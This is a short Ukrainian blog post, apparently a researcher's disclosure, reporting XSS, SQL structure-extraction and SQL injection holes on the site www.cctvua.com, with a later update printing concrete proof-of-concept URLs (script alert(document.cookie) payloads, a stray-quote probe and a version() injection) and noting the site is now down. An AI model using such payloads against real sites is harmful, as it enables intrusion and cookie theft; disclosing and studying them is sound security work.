Нові уразливості на www.cctvua.com

19:16 14.05.2010

31.10.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.cctvua.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

14.05.2010

XSS:

http://www.cctvua.com/?p=202989;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.cctvua.com/?p=202989;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28

SQL DB Structure Extraction:

http://www.cctvua.com/?p=1;a=1′

SQL Injection:

http://www.cctvua.com/?p=1;a=version()

Зараз даний сайт вже не робить.


Leave a Reply

You must be logged in to post a comment.